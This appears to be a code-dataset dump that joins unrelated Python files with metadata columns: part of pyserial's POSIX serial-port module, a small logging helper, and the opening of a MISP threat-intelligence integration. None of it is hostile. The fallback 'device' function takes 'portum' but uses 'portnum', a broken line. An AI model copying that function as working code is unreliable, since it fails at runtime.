plat[:7] == 'freebsd' or \
plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d)
def device(port):
return '/dev/cuad%d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:6] == 'darwin': # OS X
version = os.uname()[2].split('.')
# Tiger or above can support arbitrary serial speeds
if int(version[0]) >= 8:
def set_special_baudrate(port, baudrate):
# use IOKit-specific call to set up high speeds
import array, fcntl
buf = array.array('i', [baudrate])
IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t)
fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1)
else: # version < 8
def set_special_baudrate(port, baudrate):
raise ValueError("baud rate not supported")
def device(port):
return '/dev/cuad%d' % port
baudrate_constants = {}
elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk
def device(port):
return '/dev/dty%02d' % port
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:4] == 'irix': # IRIX (partially tested)
def device(port):
return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:2] == 'hp': # HP-UX (not tested)
def device(port):
return '/dev/tty%dp0' % (port+1)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed)
def device(port):
return '/dev/tty%c' % (ord('a')+port)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
elif plat[:3] == 'aix': # AIX
def device(port):
return '/dev/tty%d' % (port)
def set_special_baudrate(port, baudrate):
raise ValueError("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
else:
# platform detection has failed...
sys.stderr.write("""\
don't know how to number ttys on this system.
! Use an explicit path (eg /dev/ttyS1) or send this information to
! the author of this module:
sys.platform = %r
os.name = %r
serialposix.py version = %s
also add the device name of the serial port and where the
counting starts for the first serial port.
e.g. 'first serial port: /dev/ttyS0'
and with a bit luck you can get this module running...
""" % (sys.platform, os.name, VERSION))
# no exception, just continue with a brave attempt to build a device name
# even if the device name is not correct for the platform it has chances
# to work using a string with the real device name as port parameter.
def device(portum):
return '/dev/ttyS%d' % portnum
def set_special_baudrate(port, baudrate):
raise SerialException("sorry don't know how to handle non standard baud rate on this platform")
baudrate_constants = {}
#~ raise Exception, "this module does not run on this platform, sorry."
# whats up with "aix", "beos", ....
# they should work, just need to know the device names.
# load some constants for later use.
# try to use values from TERMIOS, use defaults from linux otherwise
TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415
TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416
TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417
TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418
#TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001
TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002
TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004
#TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008
#TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010
TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020
TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040
TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080
TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100
TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR
TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG
#TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000
#TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000
TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B
TIOCM_zero_str = struct.pack('I', 0)
TIOCM_RTS_str = struct.pack('I', TIOCM_RTS)
TIOCM_DTR_str = struct.pack('I', TIOCM_DTR)
TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427
TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428
class PosixSerial(SerialBase):
"""Serial port class POSIX implementation. Serial port configuration is
done with termios and fcntl. Runs on Linux and many other Un*x like
systems."""
def open(self):
"""Open port with current settings. This may throw a SerialException
if the port cannot be opened."""
self.fd = None
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
# open
try:
self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK)
except Exception as msg:
self.fd = None
raise SerialException("could not open port %s: %s" % (self._port, msg))
#~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking
try:
self._reconfigurePort()
except:
try:
os.close(self.fd)
except:
# ignore any exception when closing the port
# also to keep original exception that happened when setting up
pass
self.fd = None
raise
else:
self._isOpen = True
#~ self.flushInput()
def _reconfigurePort(self):
"""Set communication parameters on opened port."""
if self.fd is None:
raise SerialException("Can only operate on a valid file descriptor")
custom_baud = None
vmin = vtime = 0 # timeout is done via select
if self._interCharTimeout is not None:
vmin = 1
vtime = int(self._interCharTimeout * 10)
try:
iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd)
except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here
raise SerialException("Could not configure port: %s" % msg)
# set up raw mode / no echo / binary
cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD)
lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL|
TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT
for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk
if hasattr(TERMIOS, flag):
lflag &= ~getattr(TERMIOS, flag)
oflag &= ~(TERMIOS.OPOST)
iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK)
if hasattr(TERMIOS, 'IUCLC'):
iflag &= ~TERMIOS.IUCLC
if hasattr(TERMIOS, 'PARMRK'):
iflag &= ~TERMIOS.PARMRK
# setup baud rate
try:
ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate))
except AttributeError:
try:
ispeed = ospeed = baudrate_constants[self._baudrate]
except KeyError:
#~ raise ValueError('Invalid baud rate: %r' % self._baudrate)
# may need custom baud rate, it isn't in our list.
ispeed = ospeed = getattr(TERMIOS, 'B38400')
try:
custom_baud = int(self._baudrate) # store for later
except ValueError:
raise ValueError('Invalid baud rate: %r' % self._baudrate)
else:
if custom_baud < 0:
raise ValueError('Invalid baud rate: %r' % self._baudrate)
# setup char len
cflag &= ~TERMIOS.CSIZE
if self._bytesize == 8:
cflag |= TERMIOS.CS8
elif self._bytesize == 7:
cflag |= TERMIOS.CS7
elif self._bytesize == 6:
cflag |= TERMIOS.CS6
elif self._bytesize == 5:
cflag |= TERMIOS.CS5
else:
raise ValueError('Invalid char len: %r' % self._bytesize)
# setup stopbits
if self._stopbits == STOPBITS_ONE:
cflag &= ~(TERMIOS.CSTOPB)
elif self._stopbits == STOPBITS_ONE_POINT_FIVE:
cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5
elif self._stopbits == STOPBITS_TWO:
cflag |= (TERMIOS.CSTOPB)
else:
raise ValueError('Invalid stop bit specification: %r' % self._stopbits)
# setup parity
iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP)
if self._parity == PARITY_NONE:
cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD)
elif self._parity == PARITY_EVEN:
cflag &= ~(TERMIOS.PARODD)
cflag |= (TERMIOS.PARENB)
elif self._parity == PARITY_ODD:
cflag |= (TERMIOS.PARENB|TERMIOS.PARODD)
else:
raise ValueError('Invalid parity: %r' % self._parity)
# setup flow control
# xonxoff
if hasattr(TERMIOS, 'IXANY'):
if self._xonxoff:
iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY)
else:
iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY)
else:
if self._xonxoff:
iflag |= (TERMIOS.IXON|TERMIOS.IXOFF)
else:
iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF)
# rtscts
if hasattr(TERMIOS, 'CRTSCTS'):
if self._rtscts:
cflag |= (TERMIOS.CRTSCTS)
else:
cflag &= ~(TERMIOS.CRTSCTS)
elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name
if self._rtscts:
cflag |= (TERMIOS.CNEW_RTSCTS)
else:
cflag &= ~(TERMIOS.CNEW_RTSCTS)
# XXX should there be a warning if setting up rtscts (and xonxoff etc) fails??
# buffer
# vmin "minimal number of characters to be read. = for non blocking"
if vmin < 0 or vmin > 255:
raise ValueError('Invalid vmin: %r ' % vmin)
cc[TERMIOS.VMIN] = vmin
# vtime
if vtime < 0 or vtime > 255:
raise ValueError('Invalid vtime: %r' % vtime)
cc[TERMIOS.VTIME] = vtime
# activate settings
termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])
# apply custom baud rate, if any
if custom_baud is not None:
set_special_baudrate(self, custom_baud)
def close(self):
"""Close port"""
if self._isOpen:
if self.fd is not None:
os.close(self.fd)
self.fd = None
self._isOpen = False
def makeDeviceName(self, port):
return device(port)
# - - - - - - - - - - - - - - - - - - - - - - - -
def inWaiting(self):
"""Return the number of characters currently in the input buffer."""
#~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str)
s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str)
return struct.unpack('I',s)[0]
# select based implementation, proved to work on many systems
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if self.fd is None: raise portNotOpenError
read = bytearray()
while len(read) < size:
ready,_,_ = select.select([self.fd],[],[], self._timeout)
# If select was used with a timeout, and the timeout occurs, it
# returns with empty lists -> thus abort read operation.
# For timeout == 0 (non-blocking operation) also abort when there
# is nothing to read.
if not ready:
break # timeout
buf = os.read(self.fd, size-len(read))
# read should always return some data as select reported it was
# ready to read when we get to this point.
if not buf:
# Disconnected devices, at least on Linux, show the
# behavior that they are always ready to read immediately
# but reading returns nothing.
raise SerialException('device reports readiness to read but returned no data (device disconnected?)')
read.extend(buf)
return bytes(read)
def write(self, data):
"""Output the given string over the serial port."""
if self.fd is None: raise portNotOpenError
t = len(data)
d = data
if self._writeTimeout is not None and self._writeTimeout > 0:
timeout = time.time() + self._writeTimeout
else:
timeout = None
while t > 0:
try:
n = os.write(self.fd, d)
if timeout:
# when timeout is set, use select to wait for being ready
# with the time left as timeout
timeleft = timeout - time.time()
if timeleft < 0:
raise writeTimeoutError
_, ready, _ = select.select([], [self.fd], [], timeleft)
if not ready:
raise writeTimeoutError
d = d[n:]
t = t - n
except OSError as v:
if v.errno != errno.EAGAIN:
raise SerialException('write failed: %s' % (v,))
return len(data)
def flush(self):
"""Flush of file like objects. In this case, wait until all data
is written."""
self.drainOutput()
def flushInput(self):
"""Clear input buffer, discarding all that is in the buffer."""
if self.fd is None:
raise portNotOpenError
termios.tcflush(self.fd, TERMIOS.TCIFLUSH)
def flushOutput(self):
"""Clear output buffer, aborting the current output and
discarding all that is in the buffer."""
if self.fd is None:
raise portNotOpenError
termios.tcflush(self.fd, TERMIOS.TCOFLUSH)
def sendBreak(self, duration=0.25):
"""Send break condition. Timed, returns to idle state after given duration."""
if self.fd is None:
raise portNotOpenError
termios.tcsendbreak(self.fd, int(duration/0.25))
def setBreak(self, level=1):
"""Set break: Controls TXD. When active, no transmitting is possible."""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCSBRK)
else:
fcntl.ioctl(self.fd, TIOCCBRK)
def setRTS(self, level=1):
"""Set terminal status line: Request To Send"""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str)
else:
fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str)
def setDTR(self, level=1):
"""Set terminal status line: Data Terminal Ready"""
if self.fd is None: raise portNotOpenError
if level:
fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str)
else:
fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str)
def getCTS(self):
"""Read terminal status line: Clear To Send"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_CTS != 0
def getDSR(self):
"""Read terminal status line: Data Set Ready"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_DSR != 0
def getRI(self):
"""Read terminal status line: Ring Indicator"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_RI != 0
def getCD(self):
"""Read terminal status line: Carrier Detect"""
if self.fd is None: raise portNotOpenError
s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)
return struct.unpack('I',s)[0] & TIOCM_CD != 0
# - - platform specific - - - -
def drainOutput(self):
"""internal - not portable!"""
if self.fd is None: raise portNotOpenError
termios.tcdrain(self.fd)
def nonblocking(self):
"""internal - not portable!"""
if self.fd is None:
raise portNotOpenError
fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)
def fileno(self):
"""For easier use of the serial port instance with select.
WARNING: this function is not portable to different platforms!"""
if self.fd is None: raise portNotOpenError
return self.fd
def flowControl(self, enable):
"""manually control flow - when hardware or software flow control is
enabled"""
if enable:
termios.tcflow(self.fd, TERMIOS.TCION)
else:
termios.tcflow(self.fd, TERMIOS.TCIOFF)
# assemble Serial class with the platform specifc implementation and the base
# for file-like behavior. for Python 2.6 and newer, that provide the new I/O
# library, derrive from io.RawIOBase
try:
import io
except ImportError:
# classic version with our own file-like emulation
class Serial(PosixSerial, FileLike):
pass
else:
# io library present
class Serial(PosixSerial, io.RawIOBase):
pass
class PosixPollSerial(Serial):
"""poll based read implementation. not all systems support poll properly.
however this one has better handling of errors, such as a device
disconnecting while it's in use (e.g. USB-serial unplugged)"""
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if self.fd is None: raise portNotOpenError
read = bytearray()
poll = select.poll()
poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL)
if size > 0:
while len(read) < size:
# print "\tread(): size",size, "have", len(read) #debug
# wait until device becomes ready to read (or something fails)
for fd, event in poll.poll(self._timeout*1000):
if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL):
raise SerialException('device reports error (poll)')
# we don't care if it is select.POLLIN or timeout, that's
# handled below
buf = os.read(self.fd, size - len(read))
read.extend(buf)
if ((self._timeout is not None and self._timeout >= 0) or
(self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf:
break # early abort on timeout
return bytes(read)
if __name__ == '__main__':
s = Serial(0,
baudrate=19200, # baud rate
bytesize=EIGHTBITS, # number of data bits
parity=PARITY_EVEN, # enable parity checking
stopbits=STOPBITS_ONE, # number of stop bits
timeout=3, # set a timeout value, None for waiting forever
xonxoff=0, # enable software flow control
rtscts=0, # enable RTS/CTS flow control
)
s.setRTS(1)
s.setDTR(1)
s.flushInput()
s.flushOutput()
s.write('hello')
sys.stdout.write('%r\n' % s.read(5))
sys.stdout.write('%s\n' % s.inWaiting())
del s
| 37.253456
| 117
| 0.601023
| 3,031
| 24,252
| 4.74101
| 0.230287
| 0.022547
| 0.013779
| 0.012526
| 0.304384
| 0.262004
| 0.23723
| 0.212596
| 0.177314
| 0.170007
| 0
| 0.036041
| 0.302119
| 24,252
| 650
| 118
| 37.310769
| 0.812999
| 0.250247
| 0
| 0.323256
| 0
| 0
| 0.106066
| 0
| 0
| 0
| 0.006391
| 0
| 0
| 1
| 0.106977
| false
| 0.006977
| 0.018605
| 0.027907
| 0.183721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
867600e9a45eebd6cdfd857a6ba6c53cc063cb70
| 845
|
py
|
Python
|
retro_star/utils/logger.py
|
cthoyt/retro_star
|
280231eb2f5dffc0e14bed300d770977b323205a
|
[
"MIT"
] | 65
|
2020-06-27T04:28:21.000Z
|
2022-03-30T11:18:22.000Z
|
retro_star/utils/logger.py
|
cthoyt/retro_star
|
280231eb2f5dffc0e14bed300d770977b323205a
|
[
"MIT"
] | 15
|
2020-07-07T13:17:05.000Z
|
2022-03-22T12:52:29.000Z
|
retro_star/utils/logger.py
|
cthoyt/retro_star
|
280231eb2f5dffc0e14bed300d770977b323205a
|
[
"MIT"
] | 14
|
2020-06-30T09:22:13.000Z
|
2022-03-30T11:18:28.000Z
|
import logging
def setup_logger(fname=None, silent=False):
if fname is None:
logging.basicConfig(
level=logging.INFO if not silent else logging.CRITICAL,
format='%(name)-12s: %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filemode='w'
)
else:
logging.basicConfig(
level=logging.INFO if not silent else logging.CRITICAL,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename=fname,
filemode='w'
)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
| 33.8
| 81
| 0.571598
| 91
| 845
| 5.296703
| 0.428571
| 0.068465
| 0.099585
| 0.112033
| 0.497925
| 0.497925
| 0.443983
| 0.443983
| 0.443983
| 0.443983
| 0
| 0.014901
| 0.285207
| 845
| 24
| 82
| 35.208333
| 0.783113
| 0
| 0
| 0.363636
| 0
| 0
| 0.183432
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86760e9869adb9d8e359c444118b7fb153ad2c74
| 63,014
|
py
|
Python
|
Packs/MISP/Integrations/MISPV3/MISPV3.py
|
hiep4hiep/content
|
f609c4c9548fe2188e8e2e00b2c9e80a74e24427
|
[
"MIT"
] | null | null | null |
Packs/MISP/Integrations/MISPV3/MISPV3.py
|
hiep4hiep/content
|
f609c4c9548fe2188e8e2e00b2c9e80a74e24427
|
[
"MIT"
] | 42
|
2022-03-11T10:52:26.000Z
|
2022-03-31T01:50:42.000Z
|
Packs/MISP/Integrations/MISPV3/MISPV3.py
|
hiep4hiep/content
|
f609c4c9548fe2188e8e2e00b2c9e80a74e24427
|
[
"MIT"
] | null | null | null |
# type: ignore
from typing import Union, List, Dict
from urllib.parse import urlparse
import urllib3
from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute
from pymisp.tools import GenericObjectGenerator
import copy
from pymisp.tools import FileObject
from CommonServerPython import *
logging.getLogger("pymisp").setLevel(logging.CRITICAL)
def handle_connection_errors(error):
if "SSLError" in error:
return_error('Unable to connect to MISP because of a SSLCertVerificationError, '
'Please try to use the Trust any certificate option.')
if "NewConnectionError" in error:
return_error('Unable to connect to MISP because of a NewConnectionError, '
'Please make sure your MISP server url is correct.')
if "Please make sure the API key and the URL are correct" in error:
return_error('Unable to connect to MISP, '
'Please make sure the API key is correct.')
return_error(error)
def warn(*args):
"""
Do nothing with warnings
"""
pass
# Disable requests warnings
urllib3.disable_warnings()
# Disable python warnings
warnings.warn = warn
''' GLOBALS/PARAMS '''
params = demisto.params()
if not params.get('credentials') or not (MISP_API_KEY := params.get('credentials', {}).get('password')):
raise DemistoException('Missing API Key. Fill in a valid key in the integration configuration.')
MISP_URL = params.get('url')
VERIFY = not params.get('insecure')
PROXIES = handle_proxy() # type: ignore
try:
PYMISP = ExpandedPyMISP(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)
except PyMISPError as e:
handle_connection_errors(e.message)
PREDEFINED_FEEDS = {
'CIRCL': {'name': 'CIRCL OSINT Feed',
'url': 'https://www.circl.lu/doc/misp/feed-osint',
'format': 'misp',
'input': 'network'},
'Botvrij.eu': {'name': 'The Botvrij.eu Data',
'url': 'http://www.botvrij.eu/data/feed-osint',
'format': 'misp',
'input': 'network'}
}
THREAT_LEVELS_TO_ID = {
'High': 1,
'Medium': 2,
'Low': 3,
'Unknown': 4
}
MISP_ENTITIES_TO_CONTEXT_DATA = {
'deleted': 'Deleted',
'category': 'Category',
'comment': 'Comment',
'uuid': 'UUID',
'sharing_group_id': 'SharingGroupID',
'timestamp': 'LastChanged',
'to_ids': 'ToIDs',
'value': 'Value',
'event_id': 'EventID',
'ShadowAttribute': 'ShadowAttribute',
'disable_correlation': 'DisableCorrelation',
'distribution': 'Distribution',
'type': 'Type',
'id': 'ID',
'date': 'CreationDate',
'info': 'Info',
'published': 'Published',
'attribute_count': 'AttributeCount',
'proposal_email_lock': 'ProposalEmailLock',
'locked': 'Locked',
'publish_timestamp': 'PublishTimestamp',
'event_creator_email': 'EventCreatorEmail',
'name': 'Name',
'analysis': 'Analysis',
'threat_level_id': 'ThreatLevelID',
'old_id': 'OldID',
'org_id': 'OrganizationID',
'Org': 'Organization',
'Orgc': 'OwnerOrganization',
'orgc_uuid': 'OwnerOrganization.UUID',
'orgc_id': 'OwnerOrganization.ID',
'orgc_name': 'OwnerOrganization.Name',
'event_uuid': 'EventUUID',
'proposal_to_delete': 'ProposalToDelete',
'description': 'Description',
'version': 'Version',
'Object': 'Object',
'object_id': 'ObjectID',
'object_relation': 'ObjectRelation',
'template_version': 'TemplateVersion',
'template_uuid': 'TemplateUUID',
'meta-category': 'MetaCategory',
'decay_score': 'DecayScore',
'first_seen': 'first_seen',
'last_seen': 'last_seen',
'provider': 'Provider',
'source_format': 'SourceFormat',
'url': 'URL',
'event_uuids': 'EventUUIDS',
}
MISP_ANALYSIS_TO_IDS = {
'initial': 0,
'ongoing': 1,
'completed': 2
}
MISP_DISTRIBUTION_TO_IDS = {
'Your_organization_only': 0,
'This_community_only': 1,
'Connected_communities': 2,
'All_communities': 3,
'Inherit_event': 5
}
SIGHTING_TYPE_NAME_TO_ID = {
'sighting': 0,
'false_positive': 1,
'expiration': 2
}
SIGHTING_TYPE_ID_TO_NAME = {
'0': 'sighting',
'1': 'false_positive',
'2': 'expiration'
}
INDICATOR_TYPE_TO_DBOT_SCORE = {
'FILE': DBotScoreType.FILE,
'URL': DBotScoreType.URL,
'DOMAIN': DBotScoreType.DOMAIN,
'IP': DBotScoreType.IP,
'EMAIL': DBotScoreType.EMAIL,
}
DOMAIN_REGEX = (
r"([a-z¡-\uffff0-9](?:[a-z¡-\uffff0-9-]{0,61}"
"[a-z¡-\uffff0-9])?(?:\\.(?!-)[a-z¡-\uffff0-9-]{1,63}(?<!-))*"
"\\.(?!-)(?!(jpg|jpeg|exif|tiff|tif|png|gif|otf|ttf|fnt|dtd|xhtml|css"
"|html)$)(?:[a-z¡-\uffff-]{2,63}|xn--[a-z0-9]{1,59})(?<!-)\\.?$"
"|localhost)"
)
MISP_SEARCH_ARGUMENTS = [
'value',
'type',
'category',
'org',
'tags',
'from',
'to',
'event_id',
'uuid',
'to_ids',
'last',
'include_decay_score',
'include_sightings',
'include_correlations',
'limit',
'page',
'enforceWarninglist',
'include_feed_correlations',
]
EVENT_FIELDS = [
'id',
'orgc_id',
'org_id',
'date',
'threat_level_id',
'info',
'published',
'uuid',
'analysis',
'attribute_count',
'timestamp',
'distribution',
'proposal_email_lock',
'locked',
'publish_timestamp',
'sharing_group_id',
'disable_correlation',
'event_creator_email',
'Org',
'Orgc',
'RelatedEvent',
'Galaxy',
'Tag',
'decay_score',
'Object',
'Feed',
]
ATTRIBUTE_FIELDS = [
'id',
'event_id',
'object_id',
'object_relation',
'category',
'type',
'to_ids',
'uuid',
'timestamp',
'distribution',
'sharing_group_id',
'comment',
'deleted',
'disable_correlation',
'first_seen',
'last_seen',
'value',
'Event',
'Object',
'Galaxy',
'Tag',
'decay_score',
'Sighting',
]
def extract_error(error: list) -> List[dict]:
"""
Extracting errors raised by PYMISP into readable response, for more information and examples
please see UT: test_extract_error.
Args:
error: list of responses from error section
Returns:
List[Dict[str, any]]: filtered response
"""
return [{
'code': err[0],
'message': err[1].get('message'),
'errors': err[1].get('errors')
} for err in error]
def dict_to_generic_object_format(args: dict) -> List[dict]:
"""
Converts args dict into a list, please see GenericObjectGenerator Class in Pymisp.
Args:
args: dictionary describes MISP object
Returns:
list: list containing dicts that GenericObjectGenerator can take.
Examples:
>>> {'ip': '8.8.8.8', 'domain': 'google.com'}
[{'ip': '8.8.8.8'}, {'domain': 'google.com'}]
"""
return [{k: v} for k, v in args.items()]
def build_generic_object(template_name: str, args: List[dict]) -> GenericObjectGenerator:
"""
Args:
template_name: template name as described in https://github.com/MISP/misp-objects
args: arguments to create the generic object
Returns:
GenericObjectGenerator: object created in MISP
Example:
args should look like:
[{'analysis_submitted_at': '2018-06-15T06:40:27'},
{'threat_score': {value=95, to_ids=False}},
{'permalink': 'https://panacea.threatgrid.com/mask/samples/2e445ef5389d8b'},
{'heuristic_raw_score': 7.8385159793597}, {'heuristic_score': 96},
{'original_filename': 'juice.exe'}, {'id': '2e445ef5389d8b'}] # guardrails-disable-line
"""
misp_object = GenericObjectGenerator(template_name)
misp_object.generate_attributes(args)
return misp_object
def misp_convert_timestamp_to_date_string(timestamp: Union[str, int]) -> str:
"""
Gets a timestamp from MISP response (1546713469) and converts it to human readable format
"""
return datetime.utcfromtimestamp(int(timestamp)).strftime('%Y-%m-%dT%H:%M:%SZ') if timestamp else ""
def replace_keys_from_misp_to_context_data(obj_to_build: Union[dict, list, str]) -> Union[dict, list, str]:
"""
Replacing keys from MISP's format to Demisto's (as appear in ENTITIESDICT)
Args:
obj_to_build (Union[dict, list, str]): object to replace keys in
Returns:
Union[dict, list, str]: same object type that got in
"""
if isinstance(obj_to_build, list):
return [replace_keys_from_misp_to_context_data(item) for item in obj_to_build]
if isinstance(obj_to_build, dict):
return {
(MISP_ENTITIES_TO_CONTEXT_DATA[key] if key in MISP_ENTITIES_TO_CONTEXT_DATA else key):
replace_keys_from_misp_to_context_data(value) for key, value in obj_to_build.items()
}
return obj_to_build
def reputation_command_to_human_readable(outputs, score, events_to_human_readable):
found_tag_id, found_tag_name = "", ""
for event in events_to_human_readable:
# removing those fields as they are shared by the events
found_tag_id = event.pop('Tag_ID')
found_tag_name = event.pop('Tag_Name')
return {
'Attribute Type': outputs[0].get('Type'),
'Dbot Score': score,
'Attribute Value': outputs[0].get('Value'),
'Attribute Category': outputs[0].get('Category'),
'Timestamp': outputs[0].get('Timestamp'),
'Events with the scored tag': events_to_human_readable,
'Scored Tag ID': found_tag_id,
'Scored Tag Name': found_tag_name,
}
def limit_tag_output_to_id_and_name(attribute_dict, is_event_level):
"""
As tag list can be full of in unnecessary data, we want to limit this list to include only the ID and Name fields.
In addition, returns set of the found tag ids.
Some tags have a field called inherited. When it is set to 1 it says that it is an event's tag.
Otherwise (if it is set to 0 or not exists) it says that it is an attribute's tag.
If the data is event's (is_event_level = true) we would like to add to tag_set_ids all the tags
(event ones and the event's attribute tags ones as it is part of the event scope).
If the data is attribute's (is_event_level = false), and the tag is only related to an attribute
we would like to add it to tag_set_ids. In any other case, we won't add the tag.
Args:
attribute_dict (dict): The dictionary that includes the tag list.
is_event_level (bool): Whether the attribute_dict was received from an event object,
meaning the tags are event's ones. Otherwise, the data is attribute's (attribute tags).
"""
output = []
tag_set_ids = set()
tags_list = attribute_dict.get('Tag', [])
for tag in tags_list:
is_event_tag = tag.get('inherited', 0) # field doesn't exist when this is an attribute level, default is '0'
tag_id = tag.get('id')
if is_event_level:
tag_set_ids.add(tag_id)
else: # attribute level
if not is_event_tag:
tag_set_ids.add(tag_id)
output.append({'ID': tag_id, 'Name': tag.get('name')})
return output, tag_set_ids
